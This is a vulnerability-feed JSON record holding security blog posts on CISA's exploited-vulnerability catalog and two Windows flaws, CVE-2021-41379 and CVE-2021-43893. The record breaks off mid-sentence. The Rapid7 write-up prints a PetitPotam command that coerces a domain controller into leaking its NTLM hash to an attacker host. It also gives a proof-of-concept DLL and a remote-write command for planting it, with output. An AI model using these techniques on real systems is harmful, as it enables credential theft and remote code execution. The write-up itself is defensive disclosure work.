{"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-24T14:21:50", "id": "MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/windows-installer-vulnerability-becomes-actively-exploited-zero-day/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-14T11:27:50", "description": "On Friday March 3, the Cybersecurity and Infrastructure Security Agency (CISA) added a whopping number of 95 new known exploited vulnerabilities to its Known Exploited Vulnerabilities Catalog.\n\nThis catalog provides Federal Civilian Executive Branch (FCEB) agencies with a list of vulnerabilities that are known to be exploited in the wild and gives the agencies a due date by when the vulnerability needs to be patched in their organization.\n\nBut even if your organization isn't a FCEB agency that needs to follow the [Binding Operation Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>), the CISA list can act as a good guide for your [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>) strategy.\n\n## 95 new ones?\n\nCISA normally sends out a mail every few days in which it details a few important vulnerabilities it's added to the Catalog. However, on March 3 it didn\u2019t even enumerate the list. Instead, it just emailed a [link to the Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and included instructions on how to find the most recently added vulnerabilities. If you're looking yourself, you need to click on the arrow on the of the "Date Added to Catalog" column, which will sort by descending dates.\n\n## Not so new\n\nThe first thing that jumped out at me is that these vulnerabilities were not all very new at all. The oldest vulnerability on that list is [CVE-**2002**-0367](<https://nvd.nist.gov/vuln/detail/CVE-2002-0367>), an almost 20 year old vulnerability in Windows NT and Windows 2000. In fact, only 5 vulnerabilities were patched in 2022. All these applied to Cisco\u2019s Small Business RV160, RV260, RV340, and RV345 series routers by the way.\n\nThis brings me to the next thing that is remarkable. 38 of the 95 added vulnerabilities are for [Cisco products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-cisco-fixes-several-vulnerabilities/>). Other products include those by Microsoft (27), Adobe (16), and Oracle(7).\n\nOf the Adobe vulnerabilities, nine were found in Flash Player. Adobe Flash Player reached End of Life (EOL) on December 31, 2020, after being first announced in 2017. Since Adobe no longer supports Flash Player, on January 12, 2021, the company started blocking Flash content from running. In fact, [Adobe strongly recommends](<https://www.adobe.com/nl/products/flashplayer/end-of-life.html>) all users immediately uninstall Flash Player to help protect their systems.\n\n## Possible reasons\n\nPondering the reason for CISA to suddenly add 95 vulnerabilities to their list, I came up with the following options:\n\n * It suddenly became aware of several old vulnerabilities that were nonetheless still being exploited.\n * It suddenly decided to list vulnerabilities in software that has long reached EOL but could still be used a lot.\n * The nature of actively exploited vulnerabilities has changed.\n\n## Some examples\n\nPersonally, I suspect that the nature of the actively exploited vulnerabilities has changed. Last year, you would typically see exploited vulnerabilities that would allow an attacker to breach a network or compromise a system to gain a foothold. This allows attackers to exfiltrate data, plant ransomware, and other criminal activities that could lead to financial gain.\n\nHowever, looking at some of the vulnerabilities that were included in this list of 95, I noticed that many could lead to Denial-of-Service (DoS) attacks.\n\nExamples:\n\n * A [vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2016-8562>) in Siemens SIMATIC CP 1543-1 versions before 2.0.28 allows remotely authenticated users to cause a denial of service by modifying SNMP variables.\n * Multiple Cisco vulnerabilities on this list which could result in a DoS condition or cause an affected system to reload.\n\nOther vulnerabilities could allow attackers to run arbitrary code or cause a denial of service. For example, a [PowerPoint](<https://nvd.nist.gov/vuln/detail/CVE-2015-2424>) vulnerability that has been around since 2015 and was found to be used by the Russian state-sponsored team APT28 (aka Fancy Bear) in 2018.\n\nSome [Flash Player vulnerabilities](<https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html>) were found to be used in targeted attacks. The suspect in this case was APT37, also known as the North Korean \u201cLazarus\u201d group.\n\nA vulnerability in older Windows versions (Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1) would allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document. The use of this exploit was [attributed](<https://www.trendmicro.com/en_us/research/14/j/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm.html>) to the Russian \u201cSANDWORM\u201d operation.\n\nI also found an Elevation of Privilege (EoP) [vulnerability in a Windows Installer](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379>) on the CISA list that would allow an attacker to delete targeted files on a system. However, they would NOT gain privileges to view or modify file contents.\n\nOther interesting items on the list are some [IoT](<https://blog.malwarebytes.com/glossary/iot/>) vulnerabilities that got some fame in 2020 under the name [Ripple20](<https://www.jsof-tech.com/disclosures/ripple20/>). Successful exploitation of these vulnerabilities could result in denial of service, information disclosure or remote code execution.\n\nSo, is it just me or is there a trend here that shows vulnerabilities that were previously hard to exploit for financial gain, but are perfectly usable to disrupt operations? Could it be that, no surprise, the war in Ukraine has changed the nature of the actively exploited vulnerabilities?\n\nAccording to Adam Kujawa, Security Evangelist and Director of Malwarebytes' Threat Intel team:\n\n> "In 2007, we observed Russian sympathizers online utilizing hacking tools to launch disruption attacks against Georgian news networks and government networks, to prevent information from flowing to the public while Russia had troops roll in. Similar events have happened in Estonia, and Russian sponsored hackers are known to utilize Ukrainian networks as a kind of \u201cplayground\u201d for their attacks, shutting off power grids and other critical infrastructure, launching massive supply chain attacks against them (as in the case of NotPetya). And those are just some of the attacks we know about.\n\n> With that in mind, I believe that while many of these vulnerabilities are useless against actual intrusion and espionage, the exploits developed from them will be used to disrupt and degrade rather than collect.\n\n> I am not sure how many of these have been used in the wild, and while it is great to see CISA be proactive in spreading this information, I must wonder how much of the information will get to those protecting networks in Ukraine? Could it be that CISA may have just handed over the knowledge about various disruptive exploits that will work on unpatched systems, to be used against those who don\u2019t have endpoint patching as their top priority?"\n\n## Mitigation\n\nGiven the varied nature of the list, the most actionable advice is to keep an eye on the known exploited vulnerabilities catalog. To make things easier, you can [subscribe](<https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_136>) to receive the updates. Besides the [usual security advice](<https://blog.malwarebytes.com/awareness/2022/03/four-smb-cybersecurity-practices-during-geopolitical-upheaval/>), now seems to be a good time to invest in clever [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>), and ditch that software which has reached EOL and no longer receives security updates.\n\nStay safe, everyone!\n\nThe post [CISA list of 95 new known exploited vulnerabilities raises questions](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-03-14T11:18:33", "type": "malwarebytes", "title": "CISA list of 95 new known exploited vulnerabilities raises questions", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0367", "CVE-2014-4114", "CVE-2015-2424", "CVE-2016-4117", "CVE-2016-8562", "CVE-2021-41379"], "modified": "2022-03-14T11:18:33", "id": "MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/cisa-list-of-95-new-known-exploited-vulnerabilities-raises-questions/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-12-03T21:03:37", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-41379 | [Microsoft Advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) | [AttackerKB](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=blog>) | Scheduled (when patched) | ASAP (when released) | December 3, 2021 3:00 PM ET \n![Ongoing Exploitation of Windows Installer CVE-2021-41379](https://blog.rapid7.com/content/images/2021/11/windowsinstaller-exploit.jpg)\n\n_See the Updates section at the end of this post for new information._\n\n## Description\n\nOn November 9, 2021, as part of Patch Tuesday, Microsoft released an update to address [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), a \u201cWindows Installer Elevation of Privilege Vulnerability\u201d that had a modest CVSS score (5.5), without much fanfare. The original CVE allows an attacker to delete files on a system using elevated privileges.\n\nFast-forward to November 22, 2021, when after investigating the patch, the researcher that discovered the vulnerability, Abdelhamid Naceri, found that it did not fully remediate the issue and published proof-of-concept (PoC) code on [GitHub](<https://github.com/klinix5/InstallerFileTakeOver>) proving exploitation of the vulnerability is still possible on patched versions of Windows allowing for SYSTEM-level privileges. The working PoC \u201coverwrites Microsoft Edge elevation service 'DACL' and copies itself to the service location, then executes it to gain elevated privileges.\u201d\n\nWith a zero-day exploit available, attackers have been chipping away at ways to utilize the vulnerability, especially in [malware](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>).\n\nAs of November 30, 2021, there is not an official patch from Microsoft to fully and effectively remediate this vulnerability. Community researchers and security practitioners have noted that other Microsoft zero-day vulnerabilities this year, such as [CVE-2021-36934](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>) (\u201cHiveNightmare\u201d/\u201dSeriousSAM\u201d), were not fixed until typical Patch Tuesday release cycles even if public exploit code had already made an appearance. We expect that this vulnerability will follow that same pattern and that we won\u2019t see a new patch (and/or a new CVE, if Microsoft does indeed classify this as a patch bypass) until December 2021\u2019s Patch Tuesday.\n\n## Affected versions\n\nAccording to the researcher, all supported versions of Windows, including Windows 11 and Server 2022, are vulnerable to the exploit.\n\n## Guidance\n\nWith no official patch at this time, we recommend that organizations prepare to patch this as soon as the official fix is released. Meanwhile, Rapid7 researchers have confirmed that [a number of antimalware programs](<https://www.virustotal.com/gui/file/a43bafb2af2a1adcd1371ab3810b2908b591bc32798f3ad35ad662cf967b12fd/detection>) have added detection of Naceri's exploit, so as usual, keep those programs up to date. Lastly, organizations can detect previous exploitation of this PoC by monitoring for EventID 1033 and \u201ctest pkg\u201d (keeping in mind that the \u201ctest pkg\u201d will only find this exact PoC and may be modified by more enterprising attackers). \n**(Please see the Updates section regarding the latest on AV detection of this exploit).**\n\n![Ongoing Exploitation of Windows Installer CVE-2021-41379](https://blog.rapid7.com/content/images/2021/11/image1-2.png)\n\n## Rapid7 customers\n\nFor Rapid7 InsightVM customers, we will be releasing vulnerability checks if and when Microsoft publishes patch information for the new vulnerability.\n\nIn the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find Windows assets by creating the following query: `os.family` `contains` `windows`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `OS` `contains` `windows`.\n\n## Updates\n\n[December 3, 2021] \nRapid7 has published an in-depth technical analysis on [AttackerKB](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=blog>) that includes a streamlined, more functional PoC. Also, of note, is our research shows that attackers using this exploit can easily evade detection by AV.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T19:03:28", "type": "rapid7blog", "title": "Ongoing Exploitation of Windows Installer CVE-2021-41379", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934", "CVE-2021-41379"], "modified": "2021-11-30T19:03:28", "id": "RAPID7BLOG:E5721E7C94293776737FD29EE61C94E2", "href": "https://blog.rapid7.com/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-14T17:27:53", "description": "![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/dropping-files.jpg)\n\nOn December 14, 2021, during the [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>) chaos, Microsoft published [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>), a remote privilege escalation vulnerability affecting the Windows Encrypted File System (EFS). The vulnerability was credited to [James Forshaw](<https://twitter.com/tiraniddo>) of [Google Project Zero](<https://googleprojectzero.blogspot.com/p/about-project-zero.html>), but perhaps owing to the Log4Shell atmosphere, the vulnerability gained little to no attention.\n\nOn January 13, 2022, Forshaw [tweeted](<https://twitter.com/tiraniddo/status/1481633916507209737?s=20&t=P1xWmHiiDap39HipKqbHGg>) about the vulnerability.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image8.png)\n\nThe tweet suggests that CVE-2021-43893 was only issued a partial fix in the December 2021 update and that authenticated and remote users could still write arbitrary files on domain controllers. James linked to the Project Zero [bug tracker](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2228>), where an extended writeup and some proof-of-concept code was stored.\n\nThis vulnerability was of particular interest to me, because I had recently discovered a local privilege escalation (LPE) using file planting in a Windows product. The vulnerable product could reasonably be deployed on a system with unconstrained delegation, which meant I could use CVE-2021-43893 to remotely plant the file as a low-privileged _remote_ user, turning my LPE into RCE.\n\nI set out to investigate if the remote file-writing aspect of James Forshaw\u2019s bug was truly unpatched. The investigation resulted in a few interesting observations:\n\n * Low-privileged user remote file-writing was patched in the December update. However, before the December update, a remote low-privileged user really could write arbitrary files on system-assigned unconstrained delegation.\n * Forced authentication and relaying are still not completely patched. Relay attacks initiated on the `efsrpc` named pipe have been known since inclusion in [PetitPotam](<https://github.com/topotam/PetitPotam>) in [July 2021](<https://github.com/topotam/PetitPotam/commit/d3a3e0ccbe22432a30509df3551a7766bb89f706>). The issue seems to persist despite multiple patch attempts.\n\nAlthough the file upload aspect of this vulnerability has been patched, I found the vulnerability quite interesting. The vulnerability is certainly limited by the restrictions on where a low-privileged user can create files on a Domain Controller, and maybe that is why the vulnerability didn\u2019t receive more attention. But as I touched upon, it can be paired with a local vulnerability to achieve remote code execution, and as such, I thought it deserved more attention. I also have found the failure to properly patch forced authentication over the [EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) protocol to be worthy of more examination.\n\n## Inadequate EFSPRC forced authentication patching: A brief history of PetitPotam\n\nPetitPotam was released in the summer of 2021 and was widely associated with an [attack chain](<https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory>) that starts as an unauthenticated and remote attacker and ends with domain administrator privileges. PetitPotam is **only** the beginning of that chain. It allows an attacker to force a victim Windows computer to authenticate to a third party (e.g. [MITRE ATT&CK T118 - forced authentication](<https://attack.mitre.org/techniques/T1187/>)). The full chain is interesting, but this discussion is only interested in the initial portion triggered by PetitPotam.\n\nPetitPotam triggers forced authentication using the EFSRPC protocol. The original implementation of the exploit performed the attack over the `lsarpc` named pipe. The attack is quite simple. Originally, PetitPotam sent the victim server an [`EfsRpcOpenFileRaw`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/ccc4fb75-1c86-41d7-bbc4-b278ec13bfb8>) request containing a [UNC file path](<https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats>). Using a UNC path such as `\\\\10.0.0.4\\fake_share\\fake_file` forces the victim server to reach out to the third-party server, 10.0.0.4 in this example, in order to read off of the desired file share. The third-party server can then tell the victim to authenticate in order to access the share, and the victim obliges. The result is the victim leaks their Net-NTLM hash. That\u2019s the whole thing. We will later touch on what an attacker can do with this hash, but for this section, that\u2019s all we need to know.\n\nMicrosoft first attempted to patch the EFSRPC forced authentication in August 2021 by blocking the use of `EfsRpcOpenFileRaw` over the `lsarpc` named pipe. To do this, they added logic to `efslsaext.dll`\u2019s `EfsRpcOpenFileRaw_Downllevel` function to check for a value stored in the `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EFS\\AllowOpenRawDL`. Because this registry key doesn\u2019t exist by default, a typical configuration will always fail this check.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image10.png)\n\nThat patch was inadequate, because `EfsRpcOpenFileRaw` isn\u2019t the only EFSRPC function that accepts a UNC file path as a parameter. PetitPotam was quickly [updated](<https://github.com/topotam/PetitPotam/commit/ea66c3f141b1ce3f97865518c87a9b53ebecdb7a>) to use `EfsRpcEncryptFileSrv`, and just like that, the patch was bypassed.\n\nThe patch also failed to recognize that the `lsarpc` named pipe wasn\u2019t the only named pipe that EFSRPC can be executed over. The [`efsrpc`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/403c7ae0-1a3a-4e96-8efc-54e79a2cc451>) named pipe (among others) can also be used. `efsrpc` named pipe is slightly less desirable, since it requires the attacker to be authenticated, but the attack works over that pipe, **and** it doesn\u2019t use the `EfsRpcOpenFileRaw_Downlevel` function. That means an attacker can also bypass the patch by switching named pipes.\n\nAs mentioned earlier, PetitPotam was updated in July 2021 to use the `efsrpc` named pipe. The following output shows PetitPotam forcing a Domain Controller patched through November 2021 to authenticate with an attacker controlled box running Responder.py (10.0.0.6) (I\u2019ve left out the Responder bit since this is just meant to highlight the EFSRPC was available and unpatched for months).\n \n \n albinolobster@ubuntu:~/impacket/examples$ python3 petitpotam.py -pipe efsr -u 'lowlevel' -p \u2018cheesed00dle!' -d okhuman.ninja 10.0.0.6 10.0.0.5 \n \n \n ___ _ _ _ ___ _ \n | _ \\ ___ | |_ (_) | |_ | _ \\ ___ | |_ __ _ _ __ \n | _/ / -_) | _| | | | _| | _/ / _ \\ | _| / _` | | ' \\ \n _|_|_ \\___| _\\__| _|_|_ _\\__| _|_|_ \\___/ _\\__| \\__,_| |_|_|_| \n _| \"\"\" |_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_| \"\"\" |_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"| \n \"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-' \n \n PoC to elicit machine account authentication via some MS-EFSRPC functions\n by topotam (@topotam77)\n \n Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN\n \n \n \n [-] Connecting to ncacn_np:10.0.0.5[\\PIPE\\efsrpc]\n [+] Connected!\n [+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d\n [+] Successfully bound!\n [-] Sending EfsRpcOpenFileRaw!\n [+] Got expected ERROR_BAD_NETPATH exception!!\n [+] Attack worked!\n \n\nNot only did Microsoft fail to patch the issue, but they didn\u2019t issue follow-up patches for months. They also haven\u2019t updated their advisory indicating the vulnerability has been exploited in the wild, despite its inclusion in CISA\u2019s [Known Exploited Vulnerability Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image6-1.png)\n\nIn December 2021, Microsoft released a patch for a different EFSRPC vulnerability: [CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>). As part of the remediation for that issue, [Microsoft implemented](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>) some hardening measures on EFSRPC communication. In particular, EFSRPC clients would need to use [`RPC_C_AUTHN_LEVEL_PKT_PRIVACY`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/425a7c53-c33a-4868-8e5b-2a850d40dc73>) when using EFSRPC. If the client fails to do so, then the client is rejected and a Windows application event is generated.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image1-2.png)\n\nAt the time of the December patch, PetitPotam didn\u2019t use this specific setting. However, a quick [update](<https://github.com/topotam/PetitPotam/commit/c3accf0875729ffabac13692841e0a671f96d0f2>) allowed the exploit to comply with the new requirement and get back to leaking machine account NTLM hashes of fully patched Windows machines.\n\n## CVE-2021-43893: Windows EFS remote file upload\n\nJames Forshaw\u2019s CVE-2021-43893 dives deeper into the EFSRPC functionality, but the heart of the issue is still a UNC file path problem. PetitPotam\u2019s UNC path pointed to an external server, but CVE-2021-43893 points internally using the UNC path: `\\\\.\\C:\\`. Using a UNC path that points to the victim\u2019s local file system allows attackers to create files and directories on the victim file system.\n\nThere are two major caveats to this vulnerability. First, the file-writing aspect of this vulnerability only appears to work on systems with unconstrained delegation. That\u2019s fine if you are only interested in Domain Controllers, but less good if you are only interested in workstations.\n\nSecond, the victim server is impersonating the attacker when the file manipulation occurs. This means a low-privileged attacker can only write to the places where they have permission (e.g. `C:\\ProgramData\\`). Therefore, exploitation resulting in code execution is not a given. Still, while code execution isn\u2019t guaranteed, there are many plausible scenarios that could lead there.\n\n### A plausible scenario leading to RCE using CVE-2021-43893\n\nMy interest in this vulnerability started with a local privilege escalation that I wanted to convert into remote code execution as a higher-privileged user. We can\u2019t yet share the LPE as it\u2019s still unpatched, but we can create a plausible scenario that demonstrates the ability to achieve code execution.\n\nMicrosoft has long maintained that Microsoft services vulnerable to [DLL planting](<https://itm4n.github.io/windows-dll-hijacking-clarified/>) via a world writable `%PATH%` directory are **[won\u2019t-fix](<https://msrc-blog.microsoft.com/2018/04/04/triaging-a-dll-planting-vulnerability/>)** low-security issues \u2014 a weird position given the effort it would take to fix such issues. But regardless, exploiting world-writable `%PATH` to escalate privileges via a Windows service ([MITRE ATT&CK - Hijack Execution Flow: DLL Search Order Hijacking](<https://attack.mitre.org/techniques/T1574/001/>)) is a useful technique when it\u2019s [available](<https://github.com/rapid7/metasploit-framework/blob/1499b1988e0f6c6cb541e715cf7a3dc43d5563f3/modules/exploits/windows/local/srclient_dll_hijacking.rb>).\n\nThere\u2019s a well-known product that installs itself into a world-writable directory: [Python 2.7](<https://www.python.org/downloads/release/python-2718/>), all the way through it\u2019s final release 2.7.18.\n \n \n C:\\Users\\administrator>icacls.exe C:\\Python27\\\n C:\\Python27\\ NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)\n BUILTIN\\Administrators:(I)(OI)(CI)(F)\n BUILTIN\\Users:(I)(OI)(CI)(RX)\n BUILTIN\\Users:(I)(CI)(AD)\n BUILTIN\\Users:(I)(CI)(WD)\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n \n Successfully processed 1 files; Failed processing 0 files\n \n\nThe Python 2.7 installer drops files into `C:\\Python27\\` and provides the user with the following instructions:\n \n \n Besides using the automatically created start menu entry for the Python interpreter, you might want to start Python in the DOS prompt. To make this work, you need to set your %PATH% environment variable to include the directory of your Python distribution, delimited by a semicolon from other entries. An example variable could look like this (assuming the first two entries are Windows\u2019 default):\n \n C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\Python25\n \n Typing python on your command prompt will now fire up the Python interpreter. Thus, you can also execute your scripts with command line options, see Command line documentation.\n \n\nFollowing these instructions, we now have a world-writable directory in `%PATH%` \u2014 which is, of course, the exploitable condition we were looking for. Now we just have to find a Windows service that will search for a missing DLL in `C:\\Python27\\`. I quickly accomplished this task by restarting all the running services on a test Windows Server 2019 and watching [procmon](<https://docs.microsoft.com/en-us/sysinternals/downloads/procmon>). I found a number of services will search `C:\\Python27\\` for:\n\n * fveapi.dll\n * cdpsgshims.dll\n\nTo exploit this, we just need to drop a \u201cmalicious\u201d DLL named `fveapi.dll` or `cdpsgshims.dll` in `C:\\Python27`. The DLL will be loaded when a vulnerable service restarts or the server reboots.\n\nFor this simple example, the \u201cmalicious\u201d dll just creates the file `C:\\r7.txt`:\n \n \n #include <Windows.h>\n \n HANDLE hThread;\n DWORD dwThread;\n \n DWORD WINAPI doCreateFile(LPVOID)\n {\n HANDLE createFile = CreateFileW(L\"C:\\\\r7.txt\", GENERIC_WRITE, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);\n CloseHandle(createFile);\n return 0;\n }\n \n BOOL APIENTRY DllMain( HMODULE, DWORD ul_reason_for_call, LPVOID)\n {\n switch (ul_reason_for_call)\n {\n case DLL_PROCESS_ATTACH:\n hThread = CreateThread(NULL, 0, doCreateFile, NULL, 0, &dwThread);\n break;\n case DLL_THREAD_ATTACH:\n case DLL_THREAD_DETACH:\n case DLL_PROCESS_DETACH:\n break;\n }\n return TRUE;\n }\n \n\nAfter compiling the DLL, an attacker can remotely drop the file into `C:\\Python27` using CVE-2021-43893. The following is the output from our [refactored and updated version](<https://github.com/jbaines-r7/blankspace>) of Forshaw\u2019s original proof of concept. The attacker is attempting to remotely write the DLL on 10.0.0.6 (vulnerable.okhuman.ninja):\n \n \n C:\\ProgramData>whoami\n okhuman\\lowlevel\n \n C:\\ProgramData>.\\blankspace.exe -r vulnerable.okhuman.ninja -f \\\\.\\C:\\Python27\\fveapi.dll -i ./dll_inject64.dll\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja\n [+] Attempting to write to \\\\.\\C:\\Python27\\fveapi.dll\n [+] Encrypt the empty remote file...\n [+] Reading the encrypted remote file object\n [+] Read back 1244 bytes\n [+] Writing 92160 bytes of attacker data to encrypted object::$DATA stream\n [+] Decrypt the the remote file\n [!] Success!\n \n C:\\ProgramData>\n \n\nThe attack yields the desired output, and the file is written to C:\\Python27\\ on the remote target.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image2-1.png)\n\nBelow is the Procmon output demonstrating successful code execution as `NT AUTHORITY\\ SYSTEM` when the \u201cDFS Replication\u201d service is restarted. Note that the malicious DLL is loaded and the file \u201cC:\\r7.txt\u201d is created.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image4-1.png)\n\nDo many administrators install Python 2.7 on their Domain Controller? I hope not. That wasn\u2019t really the point. The point is that exploitation using this technique is plausible and worthy of our collective attention to ensure that it gets patched and monitored for exploitation.\n\n### What can a higher-privileged user do?\n\nOddly, administrators can do anything a low-level user can do except write data to files. When the administrator attempts to write to a file using Forshaw\u2019s ::DATA stream technique, the result is an ACCESS DENIED error. Candidly, I didn\u2019t investigate why.\n\nHowever, it is interesting 